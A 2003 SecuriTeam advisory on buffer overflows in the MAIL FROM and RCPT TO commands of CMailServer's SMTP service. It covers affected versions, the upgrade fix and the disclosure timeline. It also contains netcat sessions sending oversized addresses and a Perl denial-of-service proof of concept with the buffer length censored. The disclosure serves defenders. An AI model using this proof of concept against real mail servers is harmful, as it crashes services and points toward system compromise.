[NT] Multiple Buffer Overflow Vulnerabilities found in CMailServer (MAIL, RCPT)

• Previous message: SecuriTeam: "[NEWS] PowerLink WAN Aggregator Multiple Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 12 May 2003 13:55:00 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Multiple Buffer Overflow Vulnerabilities found in CMailServer (MAIL, RCPT)
------------------------------------------------------------------------

SUMMARY

 <http://www.youngzsoft.net/index.html> CMailServer, "a small and easy to
administer email server software and web mail server software, can help
you build your own email server for Win NT/2000/XP". A buffer overflow
vulnerability has been found in the SMTP protocol, within the CMailServer
SMTP Service, causing the service to shutdown. It is possible to actually
overwrite the exception handler on the stack allowing a system compromise
with code execution running as SYSTEM.

DETAILS

Vulnerable systems:
 * CMailServer version 4.0.2002.11.24

Immune systems:
 * CMailServer version 4.0.2003.03.30

When a malicious attacker sends a large amount into the "MAIL FROM" and
the "RCPT TO" The buffer will overflow. If the code was carefully crafted,
attackers could execute arbitrary command in system privilege.

Example:
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>

Solution:
Upgrading to the latest version solves this issue.

Disclosure timeline:
24/04/2003 The vulnerability was discovered, analysis has been made.
29/04/2003 Contacted Vendor at support@youngzsoft.net
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.

Exploit:
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown
# It is then where we can actually overwrite the exception handler on the
stack allowing
# A system compromise with code execution running as SYSTEM.
#
#
# Ive censored some of the source code out. =)
#
# Solution:
# None at this time
#
#

use IO::Socket;
    
$target = shift() || "warlab.dk";
my $port = 25;
my $Buffer = "A" x <CENSORED> ; #

my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
$resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$target.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);

ADDITIONAL INFORMATION

The vulnerability was discovered and reported by
<mailto:der@infowarfare.dk> Dennis Rand.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] PowerLink WAN Aggregator Multiple Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]